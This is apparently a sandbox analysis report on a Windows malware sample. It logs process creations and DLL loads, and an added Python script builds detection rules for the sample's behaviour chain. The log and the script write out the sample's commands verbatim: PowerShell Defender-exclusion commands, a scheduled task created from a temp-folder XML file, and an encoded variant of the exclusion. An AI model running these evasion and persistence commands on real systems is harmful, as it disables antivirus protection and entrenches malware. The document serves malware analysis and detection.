                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile read: C:\Users\user\Desktop\jKqPSehspS.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\BLpvFR.exe C:\Users\user\AppData\Roaming\BLpvFR.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Process created: C:\Users\user\AppData\Roaming\BLpvFR.exe "C:\Users\user\AppData\Roaming\BLpvFR.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Process created: C:\Users\user\AppData\Roaming\BLpvFR.exe "C:\Users\user\AppData\Roaming\BLpvFR.exe"
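The process chain above is the whole persistence and evasion story of this sample in three moves: PowerShell adds a Defender exclusion for the dropper and for the dropped copy in %APPDATA%, schtasks registers "Updates\BLpvFR" from an XML file in %TEMP%, and each binary then starts a second copy of itself, which is the injection target reported in the overview. Below is an added example of detection logic for exactly that chain; it is not part of the Joe Sandbox report and not the sample's code. The events are transcribed from the "Process created" lines above; the last two events (a base64 -EncodedCommand variant of the exclusion, and an exclusion of a path under Program Files) are constructed controls that do not appear in the report, added so the rules can be seen to fire and not fire. Matching is on command line and parent/child image only, so the 32-bit SysWOW64 PowerShell path the sample actually launches makes no difference to the rules.

```python
"""Triage rules for the Defender-exclusion / schtasks / self-spawn chain."""
import base64
import re

PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
DROPPER = r"C:\Users\user\Desktop\jKqPSehspS.exe"
PAYLOAD = r"C:\Users\user\AppData\Roaming\BLpvFR.exe"


def _encoded(script):
    """-EncodedCommand carries base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events (parent image, child image, child command line), transcribed
# from the report's "Process created" lines. The last two are constructed controls
# that are NOT in the report: an encoded-command variant and a benign exclusion.
EVENTS = [
    (None, DROPPER, f'"{DROPPER}"'),
    (DROPPER, PS, f'{PS_CMD} Add-MpPreference -ExclusionPath "{DROPPER}"'),
    (DROPPER, PS, f'{PS_CMD} Add-MpPreference -ExclusionPath "{PAYLOAD}"'),
    (DROPPER, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"'),
    (DROPPER, DROPPER, f'"{DROPPER}"'),
    (PAYLOAD, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"'),
    (PAYLOAD, PAYLOAD, f'"{PAYLOAD}"'),
    (DROPPER, PS, f"{PS_CMD} -enc " + _encoded(f'Add-MpPreference -ExclusionPath "{PAYLOAD}"')),
    (r"C:\Windows\System32\cmd.exe", PS, f'{PS_CMD} Add-MpPreference -ExclusionPath "C:\\Program Files\\Microsoft SQL Server"'),
]

TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# Locations a standard user can write to; an exclusion there shields a dropped file.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp)\\", re.I)
TEMP_DIR = re.compile(r"\\(appdata\\local\\temp|windows\\temp)\\", re.I)


def tokens(cmdline):
    """Split a Windows command line, honouring double quotes."""
    return [a or b for a, b in TOKEN.findall(cmdline)]


def decode_encoded_command(toks):
    """Script behind -EncodedCommand (PowerShell accepts any prefix: -e, -enc, ...), or None."""
    for i, t in enumerate(toks[:-1]):
        t = t.lower()
        if t.startswith("-e") and "encodedcommand".startswith(t[1:]):
            try:
                return base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def defender_exclusions(cmdline):
    """Paths handed to Add-/Set-MpPreference -ExclusionPath (parameter may be abbreviated)."""
    toks = tokens(cmdline)
    script = decode_encoded_command(toks)
    if script is not None:
        return defender_exclusions(script)  # rescan the decoded script
    if not any(re.fullmatch(r"(add|set)-mppreference", t, re.I) for t in toks):
        return []
    found = []
    for i, t in enumerate(toks[:-1]):
        p = t[1:].lower()
        if t.startswith("-") and p.startswith("exclusionp") and "exclusionpath".startswith(p):
            found.extend(v.strip('" ') for v in toks[i + 1].split(",") if v.strip('" '))
    return found


def schtasks_from_temp(cmdline):
    """(task name, xml path) when schtasks /Create takes its XML from a temp directory."""
    toks = tokens(cmdline)
    low = [t.lower() for t in toks]
    if "/create" not in low or "/xml" not in low or low.index("/xml") + 1 >= len(toks):
        return None
    xml = toks[low.index("/xml") + 1]
    name = toks[low.index("/tn") + 1] if "/tn" in low and low.index("/tn") + 1 < len(toks) else ""
    return (name, xml) if TEMP_DIR.search(xml) else None


def triage(events):
    """Run the three rules over (parent, image, cmdline) events; return (rule, image, detail)."""
    findings = []
    for parent, image, cmdline in events:
        for path in defender_exclusions(cmdline):
            if USER_WRITABLE.match(path):
                findings.append(("defender_exclusion_user_writable", image, path))
        hit = schtasks_from_temp(cmdline)
        if hit:
            findings.append(("schtasks_xml_from_temp", image, f"{hit[0]} <- {hit[1]}"))
        if parent and parent.lower() == image.lower():
            findings.append(("self_spawn_possible_hollowing", image, cmdline))
    return findings


if __name__ == "__main__":
    for rule, image, detail in triage(EVENTS):
        print(f"{rule:34} {image}\n{'':34} {detail}")
```

The exclusion rule deliberately keys on the cmdlet and parameter rather than on "powershell.exe", because the cmdlet is equally reachable through pwsh.exe or an -EncodedCommand wrapper, which is why the decoded script is rescanned. The Program Files control is still worth logging at a lower severity in a real pipeline; here it is left unflagged only to show that the rule discriminates on where the excluded path lives.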
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Section loaded: userenv.dll
